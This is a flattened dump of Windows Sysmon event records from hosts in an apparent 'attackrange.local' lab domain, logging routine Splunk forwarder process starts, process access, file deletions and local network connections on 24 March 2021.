21:51:04.454{896A638B-FDE5-6058-4E12-00000000AE01}38405920C:\Windows\system32\conhost.exe{896A638B-B448-605B-9869-00000000AE01}8032C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918473Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:04.452{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918472Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:04.452{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918471Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:04.452{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918470Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:04.452{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918469Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:04.452{896A638B-B5C8-6058-0500-00000000AE01}396356C:\Windows\system32\csrss.exe{896A638B-B448-605B-9869-00000000AE01}8032C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005918468Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:04.451{896A638B-FDE4-6058-4A12-00000000AE01}63644976C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{896A638B-B448-605B-9869-00000000AE01}8032C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000005918467Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:04.321{896A638B-B448-605B-9869-00000000AE01}8032C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{896A638B-B5C8-6058-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{896A638B-FDE4-6058-4A12-00000000AE01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000005918466Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:04.374{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62015650F92E4C0D0860061110E17892,SHA256=8C7A0FAEF3E748B817FF2DFA5E0B933FD7369009F0269F27A83D0FD0947114D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638788Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:05.522{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA340DAF5314643395AAC20919EBA8A7,SHA256=96361D466B4E4C0BD7941D388F98FF929D47F3C4E8D44B147B122241DB437D7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918492Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:05.835{896A638B-B5CA-6058-1200-00000000AE01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=C66726DE6B65B4D9CDD3A40B1986004D,SHA256=026A3FE762F1DEFC255162EE19550C16C0C6D9DA1FACB068F4F02C8FF0E756F1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918491Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:05.752{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918490Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:05.752{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000005918489Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:02.911{896A638B-B5C0-6058-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:d5e5:e17e:c4fa:f709win-dc-792.attackrange.local1052-truefe80:0:0:0:d5e5:e17e:c4fa:f709win-dc-792.attackrange.local445microsoft-ds 354300x80000000000000005918488Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:02.910{896A638B-B5C0-6058-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:d5e5:e17e:c4fa:f709win-dc-792.attackrange.local1052-truefe80:0:0:0:d5e5:e17e:c4fa:f709win-dc-792.attackrange.local445microsoft-ds 23542300x80000000000000005918487Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:05.390{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9AC1742FAAA3E55EF0454A0DCA3FC3C,SHA256=D5D436547613DA6A7961EAD855200D058C1A4F7E71297AC6204B413FE81F9D8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918486Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:05.257{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D55AAB63BC8CD007B063DD81F85DB411,SHA256=AAB43A100770DDD356ABDBD9D79B514639B30D2B3FDBFE27B652D53E11071B6A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918485Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:05.226{896A638B-FDE5-6058-4E12-00000000AE01}38405920C:\Windows\system32\conhost.exe{896A638B-B449-605B-9969-00000000AE01}7632C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918484Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:05.224{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918483Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:05.224{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918482Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:05.224{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918481Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:05.224{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918480Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:05.223{896A638B-B5C8-6058-0500-00000000AE01}396412C:\Windows\system32\csrss.exe{896A638B-B449-605B-9969-00000000AE01}7632C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005918479Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:05.223{896A638B-FDE4-6058-4A12-00000000AE01}63644976C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{896A638B-B449-605B-9969-00000000AE01}7632C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000005918478Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:05.094{896A638B-B449-605B-9969-00000000AE01}7632C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{896A638B-B5C8-6058-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{896A638B-FDE4-6058-4A12-00000000AE01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000638789Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:06.537{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FD55D9C1E77D21AB23CF6A2ECD42319,SHA256=C441440C30B2EFE3999C2C89B8DCF5A5F118CCB6943ED62F3DE3BF1426D9C884,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918496Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:06.753{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918495Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:06.753{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918494Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:06.396{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C2C799D93AC057E435A3FDFF485E488,SHA256=DE12E1668A190F145A965BEFB3E53B7637E9F0CA31E68DF8AD4489B7C93101BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918493Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:06.382{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7C6137355640D11CAD84CD5CFF2E572E,SHA256=03B8B8C78A4F41EA6D470BD605399945D2136270B98E8E11EA8BA06BAD4531FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638791Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:07.553{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3D6FABBE0E6DD1EF55F1F14CE68E4DD,SHA256=3E287ED4F168A7A6B939E03A56291EA4F26565A3A2B1BDC262F905F50B0F30E1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918500Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:07.753{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918499Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:07.753{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000005918498Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:04.775{896A638B-FDEB-6058-7912-00000000AE01}1496C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-792.attackrange.local1053-false10.0.1.12-8000- 23542300x80000000000000005918497Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:51:07.399{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C1A425DB697A4C33A0D45C65D3677A5,SHA256=E4EEA6F136159E9F28E6FA89E28AC9C9AAC11B66ED7CA1ED31EFD2DF491A6FF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638790Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:07.334{BFB545BB-B8FB-6058-A200-00000000AF01}3640NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=110595CEF9B4CBA210BA20B2379C084A,SHA256=7D73824D889500B0F5D9723AA57E5770140E65EEF42DCF932AD014F8B83C23F6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000638794Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 